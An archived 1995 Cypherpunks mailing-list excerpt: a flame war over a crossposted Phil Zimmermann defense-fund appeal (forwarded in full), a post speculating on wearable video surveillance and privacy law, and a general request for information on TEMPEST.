Todd Masco) Date: Fri, 6 Jan 95 22:02:08 PST Subject: Files and mail Message-ID: <199501070607.BAA04310@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Anybody want to offer odds on whether or not this merry little exchange will be reported in Wired as news? - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLw301xNhgovrPB7dAQFj3gP8CJV4TyRUl+sEQRHX6qH2TKK+B+JKLrwk kUM7Y0yaY2ZwScBnYRva5/Pyu8r70i2Z3yQUQFF7ECasxHwrYftfWweD0/4Pc4ws qEGNfGIheHtnP/J0B7G7xsIyAMSZIlUD3RCQ49o4BOpWk6bev4t5i/RP10yK9sit dA1go4Jiaag= =eQPF - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw4vqSoZzwIn1bdtAQER/QF/SkRQGEEjHn+E0SZEiWs0McAvRccuzxFQ Uv76Kmmya6EMxTJOJFtatP1uQ7V6JmSA =g1Bd -----END PGP SIGNATURE----- From cactus at hks.net Fri Jan 6 22:10:57 1995 From: cactus at hks.net (L. Todd Masco) Date: Fri, 6 Jan 95 22:10:57 PST Subject: Too Much! Message-ID: <199501070616.BAA04394@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article you write: > Yet again I have un-subbed from the list because of the S/N ratio. And >things were looking so good there for a while. You might want to try reading it from NNTP, via c2.org or hks.net. You can then use Kill files. Wonderful beasts, those. (And if more people do this, we could actually try to use some distributed mechanisms such as that that strn uses.) 
- - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLw32/xNhgovrPB7dAQEUBwQAhWOYKkqwHGyi2eFfnYt+8LsFU+Af3Lsl sT1VDjICu1XIAhswVfKL+h7Dn9r1pmeNHtJFF0V8S/fKGVOU5dhv+gZZwVOTjbnL a2g+MTZkh/vonVy5PLDELrpeRlcVdxR+abcg9AWahjYCFlua8NR5GjiN6iKeC1C8 o3F377//PSU= =rxxD - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw4xuCoZzwIn1bdtAQHTNgF/T9OR6yUCu05KZW4s3MSHptRoclc31xO8 5O0jAXDA0c9oE/39smLZ++I6OoGh7Wiq =5/FC -----END PGP SIGNATURE----- From erc at s116.slcslip.indirect.com Fri Jan 6 22:26:18 1995 From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin]) Date: Fri, 6 Jan 95 22:26:18 PST Subject: Files and mail In-Reply-To: <199501070607.BAA04310@bb.hks.net> Message-ID: > Anybody want to offer odds on whether or not this merry little exchange > will be reported in Wired as news? No bet. ;) The computer press is pretty immature, they'll report almost anything. Personally, I think both Carol Anne Braddock and Mike Horwath BOTH need to grow up, along with a substantial number of the snipers and slammers and back-seat-driver commentators regarding this thread. Maybe they ought to restrict net access by age? 25 or so oughta be a good age ... anyone younger is barred from access, or unless they provide evidence that they have a maturity level greater than that of your average six-year-old. -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! 
** "What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning" From jcorgan at scruznet.com Fri Jan 6 22:28:11 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Fri, 6 Jan 95 22:28:11 PST Subject: Too Much! Message-ID: >You might want to try reading it from NNTP, via c2.org or hks.net. You >can then use Kill files. What is the group name? == Johnathan Corgan "Violence is the last refuge of the incompetent." jcorgan at scruznet.com -Isaac Asimov From carolann at mm.com Fri Jan 6 23:18:51 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 23:18:51 PST Subject: Soapbox mode on!(but short) In-Reply-To: <9501062310.AB20311@eri.erinet.com> Message-ID: Dear Paul J. Ste. Marie, I was quietly going through my mail after an eight hour layoff. The first thing you do is lie. I have called you a liar. Point Blank! And for the honor of this very list, so that there is some credibility, I shall retrieve from a tin reader the actual posting, COMPLETE WITH HEADER. And what makes creeps like you going is the ability to continue, to spread those lies. [soapbox mode on] THE POSTING WENT UNANSWERED FOR 3 DAYS IN 10 NEWSGROUPS. UNANSWERED...NADA ...NO BYTES...NO BITS.....NO ANYTHING THE FIRST PERSON TO RESPOND WAS HORWATH, ISSUING SOME KIND OF REALLY LAME APOLOGY...TO WHOM NO ONE KNOWS, FOR NO ONE HAD RESPONDED....GET IT....CAN YOU HANDLE PLAIN ENGLISH? NO MR. STE. MARIE I WILL NOT START RUMOR OR CONTINUE RUMOR. YOU HAVE LIED TO THE FINE PEOPLE OF CYPHERPUNK LIST. YOU HAVE WASTED THEIR TIME AND THEIR BANDWIDTH (THEIR LIFE) FOR THE MOST IMPORTANT CODE YOU CAN EVER WRITE IS THE TRUTH. [soapbox mode off] Please pardon me now, while I retrieve the actual postings. Love Always, Carol Anne On Fri, 6 Jan 1995, Paul J. Ste. Marie wrote: > At 08:58 AM 1/6/95 +0000, Nesta Stubbs wrote: > >On Fri, 6 Jan 1995, Carol Anne Braddock wrote: > > ... > >> I "crossposted" it to my favorite 10 newsgroups. Just 10. 
> >> Some creep complained. (we'll get to him a bit later). > >> > >ten is not a large number when it comes to cross-posting on some topics, I > >can think of at least twenty newsgroups where the PRZ letters and such > >would make a lot of sense and be on topic. This just goes to show the > >sometimes reactionary steps people take to control spamming. ... > > The discussion on alt.current-events.net-abuse seemed to indicate that the > claim of "Just 10" above is a slight understatement. The newsgroups seem to > have been hit alphabetically, and I believe the total count was in the hundreds. > > --Paul J. Ste. Marie > pstemari at well.sf.ca.us, pstemari at erinet.com > > Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From nissim at acs.bu.edu Fri Jan 6 23:55:20 1995 From: nissim at acs.bu.edu (nissim at acs.bu.edu) Date: Fri, 6 Jan 95 23:55:20 PST Subject: what to do about live video - all the time? Message-ID: <199501070745.CAA64839@acs.bu.edu> I've just invented a big hassle, and if I don't start the patent process someone else will. Picture a near future in which your shirt or walkman is a 360 degree video camera sensing live video across visible and other spectra. Your shirt sends out a signal to your home computer, Your home computer archives your daily environment and activities for you. You have been sold this device on several premises. 1) crime reduction - no sane low level criminal would harass you; you have him, his biometrics, unique thermal signature etc. on video. Talk about neighborhood watch. 2) life/work productivity enhancement. What was said when? what could you have looked into today but slipped your mind? 3) warm fuzzies. Kodak style "your life in pictures." For now I'll assume the device actually works as claimed. It is affordably priced. Any normal person who has a car alarm, walkman, or laptop PC is apt to have one. 
You even get a small discount on your health insurance. Maybe your local taxes go down as your district votes to reduce the # of cops. For now, we assume that all the output of your video shirt is securely encrypted when it leaves the Vshirt. ISSUE 1: Who controls the data? Year 0: The devices are so rare the police don't think to ask people to supply their tapes if they witness a crime committed re: a third party. Year 3: The police subpoena Vshirts they know to be in the crime vicinity. Presumably they use their current abilities with cellphone companies to locate who's where when. Year 3.1 While reviewing Vshirt tapes police note that non-case related illegal activities are going on. Jaywalking. Speeding. Recreational drugs. Verbal assault. Life and property threatening felonies are also discovered. At this point the scene bifurcates wildly: Do the police say, "look, this is happening anyway, we need 24 hour video surveillance of everything - if nothing else to protect ourselves in court." Evidence: in the UK they video the motorways, and several public areas in the cities (soc.culture.british Jan '95) -for crime/security purposes. In the US, there are utility poles wired for sound. Design News had an item on this in their Yellow newsflash section in '93 I think. The utility poles were/are in Washington DC, and supposedly only listen for gunshots. I'm pretty sure the poles could call the cops in using triangulated crime location data too. However slight the infraction, we are all lawbreakers. Do we have a right to "not testify against ourselves" by refusing to decrypt? Can we buy (ugh.) an "attorney-client privilege" box that holds all of our data Keys in a legal fiction that the courts currently respect? Will the 5th fare any better than the 1st and second amendments? Will the state issue a "statute of limitations" on data-recorded crime, so that you can't be arrested for last year's public drunkenness? 
Will Vshirt makers make, or be allowed to make, devices that create -absolutely no residue- data keys? that way, if you want to protect yourself from what you happened last Thursday you can set the keystrip on fire and nobody, not even you, has a hope of ever decrypting? Evidence: in the US Digital audio tape Mfrs. are required to put in some sort of copyguard. Also scanners w/image signature. In the US, reconstructed deleted files for legal purposes is considered legal evidence. There is a firm in Seattle that has even reconstructed harddisks written over with 0s for criminal (tax) cases. Citizens or their employers are required to keep and prepare documentation adequate to prepare a valid tax return. i.e., some records you _have_ to keep. and of course the digital telephony bill... What thoughtful Pro-freedom arguments can be constructed to deal with this device and its social fallout? What thoughtful software and hardware can be created? The device does not yet exist, but component parts can be assembled for less than $2000 and 17oz weight that do a fair job of mimicking it. Moore's "law" suggests that by 2000, these oughta be $19.99/month plus data charges. VoicePGP is a great jumping-off place...will there be a VideoPGP, or rather an optimized-for-videoPGP coming soon? If I've christened its existence now. I hereby declare the application of Public+private key cryptography as it especially applies to picture, live picture, and/or video transmission to be public domain. (Surely I'm not the first, but this can't hurt.) Write. Talk. Create. Protect yourselves. ObLameJoke: Well, as far as I know none of my relatives were killed by Stalin, or Mao, or interned in WWII, or blacklisted, or even jailed. I suppose a few were drafted. I guess it's about time for the forces of authority to reach into my little corner of the gene pool and crush me too. I mean, I'm missing out! 
Treon Verdery, posting under the auspices of Adam Almog From carolann at mm.com Fri Jan 6 23:59:11 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 23:59:11 PST Subject: From me to me to you...The Actual Article Message-ID: Dear All of You, This is the article, and what I did with it. It is complete in its entirety, from the bang paths, to the crosspostings. Please study them carefully, for my next post will contain the first response to the article, three days later. ALL DURING THIS TIME, I WAS LED TO BELIEVE, THROUGH PHONE CALLS THAT THIS WAS "GOING TO BE INVESTIGATED SOON". NOTHING OF THE SORT HAPPENED. NO ONE IN ANY OF THE TEN GROUPS RAISED A SINGLE OBJECTION. PERIOD. I believe in your capacity to fairly judge. My response to the first complaint lies still censored in my mail reader. For if .1% of all the Usenet is inappropriate to post to, when will it become just .01% ? Now, the article, From carolann at mm.com Sat Jan 7 00:15:04 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 00:15:04 PST Subject: The first reply came 3 days later. Message-ID: These groups are important to me. It is why I posted them there. I use PGP extensively in my usenet postings, and I am not the only one in those groups that posts with PGP. Yes, suffice to say, I endorse this letter. I dream of a day when we do not have to deal with this issue, yet it is something that affects any one who uses the program. All that was really asked was not to go to the meeting with the D.A., and make a protest. MOST CYPHERPUNKS I KNOW OF COULDN'T HAVE MADE IT ANYWAY, THIS TIME, BECAUSE THE STAKES IN THE REMAILER GAME ARE HIGH, AND WITHIN A MONTH OR TWO, THERE WILL BE A SYSTEM SO THAT WE CAN GET SOME MONEY TO EAT WITH AND BUY EQUIPMENT. But on the user level, I do my best to TEACH GOOD FUNDAMENTAL COMPUTER SAFETY. Rumors are no good for this. There was PRZ's letter to us, and Dubois's letter to alt.security pgp. Those are facts. 
Those I can teach with, and so can even a one month PGP Cypherpunk Novice. So can you. Now, the first reply, From Derek.Zeanah at f903.n102.z1.fidonet.org Sat Jan 7 00:52:00 1995 From: Derek.Zeanah at f903.n102.z1.fidonet.org (Derek Zeanah) Date: Sat, 7 Jan 95 00:52:00 PST Subject: TEMPEST Questions... Message-ID: <121_9501062145@borderlin.quake.com> -----BEGIN PGP SIGNED MESSAGE----- I'm writing an article on TEMPEST technology. The focus is on what TEMPEST is and how to defeat it, if possible. So far I've gotten some insightful information, but I'm looking for all I can get. Has anyone ever heard of TEMPEST being used in the continental US? Can anyone tell me what measures offer some level of protection, or steps that can be taken to reduce the likelihood of being successfully targeted? Has anyone ever seen TEMPEST in action? Any and all information will be greatly appreciated. I prefer responses via e-mail to dzeanah at holonet, but I also read this newsgroup pretty frequently. Thanks a lot. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLw4n/EwIwf2qjF2hAQGcuQP/UtKXz0w3icEf3j094LpkOmr7t+miBcT4 9T0rsZ8UNz/Md7l4iY0sA929vU5IiZs58dTH0qiIVrFLf5qh0hzV+7edX6ARxccP ZSsdchd6g6LdRJn+s4QvOQT19TgcAGfW1p0lbVvDKGsh2+KmpQ4jHiLC3ugYq2x3 nqL4aY8dC4c= =L/Fy -----END PGP SIGNATURE----- ~~~ PGPBLUE 3.0 ... 
I don't see my signature anywhere on this "social contract" -- | Fidonet: Derek Zeanah 1:102/903 | Internet: Derek.Zeanah at f903.n102.z1.fidonet.org | via Borderline! uucp<->Fido{ftn}gate Project +1-818-893-1899 From carolann at mm.com Sat Jan 7 00:56:30 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 00:56:30 PST Subject: I haven't read this response, until now! Message-ID: Dear All, I haven't seen the next two responses, yet they comprise all the responses that ten news groups had made as of this posting, in my newsreader here at MM.COM. I am told there are now more, yet I think it's kind of a moot point (david at winternet.com was the reporter). So I am going to import the text now and read it finally. I have read the text, and I giggle a little, at who sent it. Now you already have had the advantage of seeing copy by Mr. Horwath. Mr. Logajan didn't. And didn't for a number of days. Nor did anyone else either. [teacher mode on] LOOK AT THE GROUPS MR. LOGAJAN IS RESPONDING TO. HE IS ONLY REPLYING TO ONE, NOT TEN GROUPS. AND, EITHER HE OR MR. HAS CENSORED NINE OTHER GROUPS FROM THEIR RIGHTFUL REPLIES. I DO BELIEVE, WHEN YOU LOOK AT MR. HORWATH'S PRIOR POSTING, I THINK YOU WILL FIND THAT HE DID TAMPER WITH THE POSTING. AND, WHAT YOU GET AS A LESSON HERE IS JUST WHY THE REMAILER PROGRAM IS IN TROUBLE. THERE JUST HAS TO BE PLAIN AND SIMPLE TRUST. MR. LOGAJAN IS UNDER THAT SIMPLE DELUSION, FOR THE MOMENT. YET AS CYPHERPUNKS, THERE IS A KIND OF AN UNSTATED UNDERSTANDING THAT WE DO NOT DO THIS TO OTHERS OR OURSELVES. [teacher mode off] Mr. Horwath at least owes Mr. Logajan an apology. For misrepresentation. Mr. Horwath owes nine newsgroups an apology. For telling them (through omission) that mn.general is more important than they are. It was about this point I was on the list again. The damage was done, and now repairs were under way. Now, the third and last response I know of, to this point. 
From carolann at vortex.mm.com Fri Jan 6 23:26:26 1995 From: carolann at vortex.mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 1995 01:26:26 -0600 Subject: (fwd) Re: Phil Zimmermann Message-ID: <53ae08506afed0671ca88cb1b531a06e@NO-ID-FOUND.mhonarc.org> Path: vortex.mm.com!news2.mr.net!mr.net!umn.edu!spool.mu.edu!howland.reston.ans.net!pipex!uunet!winternet.com!icicle.winternet.com!carolann From: Carol Anne Braddock Newsgroups: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams Subject: Re: Phil Zimmermann Date: Mon, 2 Jan 1995 04:05:13 -0600 Organization: StarNet Communications, Inc Lines: 317 Message-ID: References: <3dtkaj$lg8 at news-2.csn.net> <3dvdsb$ads$1 at mhade.production.compuserve.com> NNTP-Posting-Host: icicle.winternet.com Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII In-Reply-To: Please read, and help if you can. You can get PGP at my WWW HomePage. http://www.winternet.com/~carolann Love Always, Carol Anne RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REGISTERED PGP KEY NO.0C91594D carolann at icicle.winternet.com finger carolann at winternet.com |more *********************************************************************** My WWW Homepage Page is at: http://www.winternet.com/~carolann On Fri, 30 Dec 1994, Michael Paul Johnson wrote: > Christopher W. Geib <72144.1426 at CompuServe.COM> writes: > > >Phil, > > >Could you repost here the address where we can send our support? 
> > > -----BEGIN PGP SIGNED MESSAGE----- > > > Phil Zimmermann Legal Defense Fund Appeal > > In November, 1976, Martin Hellman and Whitfield Diffie announced > their discovery of public-key cryptography by beginning their paper > with the sentence: "We stand today on the brink of a revolution in > cryptography." > > We stand today on the brink of an important battle in the > revolution they unleashed. Philip Zimmermann, who encoded and released > the most popular and successful program to flow from that discovery, > Pretty Good Privacy ("PGP"), may be about to go to court. > > It has been over fourteen months now since Phil was first informed > that he was the subject of a grand jury investigation being mounted by > the San Jose, CA, office of US Customs into the international > distribution, over the Internet, of the original version of the > program. On January 12th, Phil's legal team will meet for the first > time with William Keane, Assistant US Attorney for the Northern > District of California, who is in charge of the grand jury > investigation, in San Jose. An indictment, if one is pursued by the > government after this meeting, could be handed down very shortly > thereafter. > > If indicted, Phil would likely be charged with violating statute 22 > USC 2778 of the US Code, "Control of arms exports and imports." This > is the federal statute behind the regulation known as ITAR, > "International Traffic in Arms Regulations," 22 CFR 120.1 et seq. of > the Code of Federal Regulations. Specifically, the indictment would > allege that Phil violated 22 USC 2778 by exporting an item listed as a > "munition" in 22 CFR 120.1 et seq. without having a license to do so. > That item is cryptographic software -- PGP. > > At stake, of course, is far more than establishing whether Phil > violated federal law or not. The case presents significant issues and > will establish legal precedent, a fact known to everyone involved. 
> According to his lead counsel, Phil Dubois, the US government hopes to > establish the proposition that anyone having anything at all to do with > an illegal export -- even someone like Phil, whose only involvement was > writing the program and making it available to US citizens and who has > no idea who actually exported it -- has committed a federal felony > offense. The government also hopes to establish the proposition that > posting a "munition" on a BBS or on the Internet is exportation. If > the government wins its case, the judgment will have a profound > chilling effect on the US software industry, on the free flow of > information on the emerging global networks, and in particular upon the > grassroots movement to put effective cryptography in the hands of > ordinary citizens. The US government will, in effect, resurrect > Checkpoint Charlie -- on the Information Superhighway. > > By now, most of us who are reading this know about Phil and the > case, whether by having the program and reading the doc files or by > seeing reports in the Wall Street Journal, Time, Scientific American, > the New York Times, Wired, US News and World Report, and hundreds of > other news outlets; on Usenet groups like talk.crypto.politics or > alt.security.pgp; or by listening to Phil give talks such as the one he > gave at CFP '94 in Chicago. We know that PGP has made great strides > since version 1.0, and is now a sophisticated encryption and > key-management package which has become the de facto standard in both > micro and mainframe environments. We know that Phil and the PGP > development team successfully negotiated a commercial license with > Viacrypt, and, through the efforts of MIT, a noncommercial license for > PGP with RSA Data Security, the holders of the patent on the RSA > algorithm on which PGP is based, thus freeing the program from the > shadow of allegations of patent infringement. 
We know that programs > such as PGP represent one of our best bulwarks in the Information Age > against the intrusions of public and private information gatherers. We > know that PGP is a key tool in insuring that the "Information > Superhighway" will open the world to us, without opening us to the > world. > > What we may not all know is the price Phil has had to pay for his > courage and willingness to challenge the crypto status quo. For years > now Phil has been the point man in the ongoing campaign for freely > available effective cryptography for the everyday computer user. The > costs, personal and professional, to him have been great. He wrote the > original code for PGP 1.0 by sacrificing months of valuable time from > his consulting career and exhausting his savings. He continues to > devote large amounts of his time to testifying before Congress, doing > public speaking engagements around the world, and agitating for > "cryptography for the masses," largely at his own expense. He is now > working, still for free, on the next step in PGP technology, PGP Phone, > which will turn every PC with a sound card and a modem into a secure > telephone. And we know that, just last month, he was searched and > interrogated in the absence of counsel by US Customs officials upon his > return from a speaking tour in Europe. > > Phil's legal team consists of his lead counsel, Philip Dubois of > Boulder, CO; Kenneth Bass of Venable, Baetjer, Howard & Civiletti, in > Washington, DC, first counsel for intelligence policy for the Justice > Department under President Carter; Eben Moglen, professor of law at > Columbia and Harvard Universities; Curt Karnow, a former assistant US > attorney and intellectual property law specialist at Landels, Ripley & > Diamond in San Francisco; and Thomas Nolan, noted criminal defense > attorney in Menlo Park. 
> > While this is a stellar legal team, what makes it even more > extraordinary is that several of its members have given their time for > free to Phil's case. Still, while their time has been donated so far, > other expenses -- travel, lodging, telephone, and other costs -- have > fallen to Phil. If the indictment is handed down, time and costs will > soar, and the members of the team currently working pro bono may no > longer be able to. Justice does not come cheap in this country, but > Phil deserves the best justice money can buy him. > > This is where you and I come in. Phil Dubois estimates that the > costs of the case, leaving aside the lawyers' fees, will run from > US$100,000 - $150,000. If Phil's team must charge for their services, > the total cost of the litigation may range as high as US$300,000. The > legal defense fund is already several thousand dollars in the red and > the airline tickets to San Jose haven't even been purchased yet. > > In September, 1993 I wrote a letter urging us all to support Phil, > shortly after the first subpoenas were issued by Customs. Today the > need is greater than ever, and I'm repeating the call. > > Phil has assumed the burden and risk of being the first to develop > truly effective tools with which we all might secure our communications > against prying eyes, in a political environment increasingly hostile to > such an idea -- an environment in which Clipper chips and digital > telephony bills are our own government's answer to our concerns. Now > is the time for us all to step forward and help shoulder that burden > with him. > > It is time more than ever. I call on all of us, both here in the > US and abroad, to help defend Phil and perhaps establish a > groundbreaking legal precedent. PGP now has an installed base of > hundreds of thousands of users. PGP works. 
It must -- no other > "crypto" package, of the hundreds available on the Internet and BBS's > worldwide, has ever been subjected to the governmental attention PGP > has. How much is PGP worth to you? How much is the complete security > of your thoughts, writings, ideas, communications, your life's work, > worth to you? The price of a retail application package?i Send it. > More? Send it. Whatever you can spare: send it. > > A legal trust fund, the Philip Zimmermann Defense Fund (PZDF), has > been established with Phil Dubois in Boulder. Donations will be > accepted in any reliable form, check, money order, or wire transfer, > and in any currency, as well as by credit card. > > You may give anonymously or not, but PLEASE - give generously. If > you admire PGP, what it was intended to do and the ideals which > animated its creation, express your support with a contribution to this > fund. > > * * * > > Here are the details: > > To send a check or money order by mail, make it payable, NOT to Phil > Zimmermann, but to "Philip L. Dubois, Attorney Trust Account." Mail the > check or money order to the following address: > > Philip Dubois > 2305 Broadway > Boulder, CO USA 80304 > (Phone #: 303-444-3885) > > To send a wire transfer, your bank will need the following > information: > > Bank: VectraBank > Routing #: 107004365 > Account #: 0113830 > Account Name: "Philip L. Dubois, Attorney Trust Account" > > Now here's the neat bit. You can make a donation to the PZDF by > Internet mail on your VISA or MasterCard. Worried about snoopers > intercepting your e-mail? Don't worry -- use PGP. > > Simply compose a message in plain ASCII text giving the following: > the recipient ("Philip L. Dubois, Attorney Trust Account"); the bank > name of your VISA or MasterCard; the name which appears on it; a tele- > phone number at which you can be reached in case of problems; the card > number; date of expiry; and, most important, the amount you wish to do- > nate. 
(Make this last item as large as possible.) Then use PGP to
> encrypt and ASCII-armor the message using Phil Dubois's public key,
> enclosed below. (You can also sign the message if you like.) E-mail
> the output file to Phil Dubois (dubois at csn.org). Please be sure to use
> a "Subject:" line reading something like "Phil Zimmermann Defense Fund"
> so he'll know to decrypt it right away.
>
> Bona fides: My relation to Phil Z. is that of a long-time user and
> advocate of PGP and a personal friend. For over a year I moderated the
> (no longer published) digest, Info-PGP, on the old lucpul.it.luc.edu site
> here at Loyola. I am in no way involved with the administration of the
> PZDF. I volunteer my time on its behalf.
> Phil Dubois is Phil Z.'s lawyer and lead counsel in the Customs case.
> He administers the PZDF.
> To obtain a copy of my public key (with which you can verify the
> signature on this doc), you have a number of options:
> - Use the copy which I will append below.
> - Send mail to me at hmiller at luc.edu with the "Subject:" line
> reading "send pubkey"
> - Get it by anon ftp at ftp://ftp.math.luc.edu/pub/hmiller/pubkey.hm
> - Obtain it from an Internet PGP keyserver machine such as
> pgp-public-keys at pgp.ai.mit.edu. Just send a mail message to this
> address with the "Subject:" field "GET hmiller". Other keyserver
> machines on the Net which accept the same message format (and
> automatically synchronize keyrings with each other every 10 minutes or
> so) include:
>
> pgp-public-keys at pgp.mit.edu
> pgp-public-keys at demon.co.uk
> pgp-public-keys at pgp.ox.ac.uk
> pgp-public-keys at ext221.sra.co.jp
> pgp-public-keys at kub.nl
> pgp-public-keys at pgp.iastate.edu
> pgp-public-keys at dsi.unimi.it
> pgp-public-keys at pgp.dhp.com
>
> You can verify my public key by calling me at 312-338-2689 (home)
> or 312-508-2727 (office) and letting me read you my key fingerprint
> ("pgp -kvc hmiller" after you have put my key on your pubring.pgp keyring).
> I include it also in my .sig, below, if that's good enough for you.
> You might also note that Phil Zimmermann has signed my public key.
> Hopefully he is Node #1 in your Web-of-Trust! His key is available on
> the net keyservers and in the 'keys.asc' file in the PGP distribution
> packages.
> Phil Dubois's pubkey can also be obtained from the keyservers, if
> you prefer that source to the text below, and from 'keys.asc'. Phil Z.
> has signed his key as well.
>
> Here is Phil Dubois's public key:
>
> Here is my (Hugh Miller's) public key:
>
> * * *
>
> This campaign letter will be posted in a number of Usenet groups.
> I will also be turning it into a FAQ-formatted document, which will be
> posted monthly in the relevant groups and which will be available by
> anonymous ftp from ftp://ftp.math.luc.edu/pub/hmiller/PGP/pzdf.FAQ. If
> you come upon, or up with, any other ways in which we can help raise funds
> for Phil, drop me a line at hmiller at luc.edu and let me know, so that I
> can put it in the FAQ.
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
>
> iQCVAwUBLvFO3tEdYC5Hk8UpAQF6IwQAp3Ig71gGRj/dDGXDBdqj55uMQQsywhi2
> pEzh0arfrRonqMX0UleysqYqjcUtm0rvbrXoYUy8a9vJzj4Wuyf1dQ6WyqBkcmOX
> z7RGtoLVxsfTjNNTrY0810SXx/yOMYtBW7mq+zNmqEykGFZTdfsVKFEyFw6AJ//B
> Ah+LQNb01Xo=
> =aW2m
> -----END PGP SIGNATURE-----
>
>
>
> --
> Hugh Miller, Ph.D.                 Voice: 312-508-2727
> Asst. Professor of Philosophy      FAX: 312-508-2292
> Loyola University Chicago          Home: 312-338-2689
> 6525 N. Sheridan Rd.               E-mail: hmiller at luc.edu
> Chicago, IL 60626                  WWW: http://www.luc.edu/~hmiller
> PGP Public Key 4793C529: FC D2 08 BB 0C 6D CB C8 0B F9 BA 55 62 19 40 21

--
Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List
Coming Soon: The Internet Debut of CENSORED.COM

From carolann at vortex.mm.com Fri Jan 6 23:26:50 1995
From: carolann at vortex.mm.com (Carol Anne Braddock)
Date: Sat, 7 Jan 1995 01:26:50 -0600
Subject: (fwd) Re: Phil Zimmermann
Message-ID: <283c371c68a89a4d2ae07bc0ed855b15@NO-ID-FOUND.mhonarc.org>

Organization: Minnesota MicroNet, St.
Paul, MN
Path: vortex.mm.com!news2.mr.net!mr.net!winternet.com!drechsau
From: drechsau at winternet.com (Mike Horwath)
Newsgroups: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams
Subject: Re: Phil Zimmermann
Followup-To: soc.support.transgendered,alt.transgendered,mn.general,alt.sex.femdom,alt.artcom,alt.sex.bondage,alt.sex,comp.infosystems.www.users,alt.dreams.lucid,alt.dreams
Date: 5 Jan 1995 23:57:09 GMT
Organization: StarNet Communications, Inc
Lines: 12
Message-ID: <3ei10l$mvo at blackice.winternet.com>
References: <3dtkaj$lg8 at news-2.csn.net> <3dvdsb$ads$1 at mhade.production.compuserve.com>
NNTP-Posting-Host: icicle.winternet.com
X-Newsreader: TIN [version 1.2 PL2]

We wish to apologize for Carol Anne's actions while with Winternet.

This account has been deleted for breach of our AUP.

Questions, comments, problems or general bitching, please reply to this message.

--
Mike Horwath    IRC: Drechsau    LIFE: Lover    drechsau at winternet.com
Winternet: info at winternet.com    root at jacobs.mn.org <- Linux!
Twin Cities area Internet Access: 612-941-9177 for more info
Founding member of Minnesota Coalition for Internet Accessibility

--
Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List
Coming Soon: The Internet Debut of CENSORED.COM

From carolann at vortex.mm.com Fri Jan 6 23:26:51 1995
From: carolann at vortex.mm.com (Carol Anne Braddock)
Date: Sat, 7 Jan 1995 01:26:51 -0600
Subject: (fwd) Re: Phil Zimmermann
Message-ID: <1e5cdf203746b1a0144dbaf6df3710d1@NO-ID-FOUND.mhonarc.org>

Path: vortex.mm.com!news2.mr.net!mr.net!skypoint.com!jlogajan
From: jlogajan at skypoint.com (John Logajan)
Newsgroups: mn.general
Subject: Re: Phil Zimmermann
Date: 6 Jan 1995 05:09:12 GMT
Organization: SkyPoint Communications, Inc.
Lines: 13
Message-ID: <3eij9o$8nu at stratus.skypoint.net>
Reply-To: jlogajan at skypoint.com
NNTP-Posting-Host: mirage.skypoint.com
X-Newsreader: TIN [version 1.2 PL2]

Mike Horwath (drechsau at winternet.com) wrote:
: We wish to apologize for Carol Anne's actions while with Winternet.
: This account has been deleted for breach of our AUP.
: Questions, comments, problems or general bitching, please reply to this
: message.

Since you are publicly accusing Carol Anne of "breach of our AUP", you better explain what horrible crime she committed.

--
 - John Logajan -- jlogajan at skypoint.com -- 612-633-0345 -
 - 4248 Hamline Ave; Arden Hills, Minnesota (MN) 55112 USA -
 - WWW URL = http://www.skypoint.com/subscribers/jlogajan -

--
Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List
Coming Soon: The Internet Debut of CENSORED.COM

From carolann at vortex.mm.com Fri Jan 6 23:26:52 1995
From: carolann at vortex.mm.com (Carol Anne Braddock)
Date: Sat, 7 Jan 1995 01:26:52 -0600
Subject: (fwd) Re: Phil Zimmermann
Message-ID:

Path: vortex.mm.com!news2.mr.net!mr.net!winternet.com!news
From: "Mr.Fish"
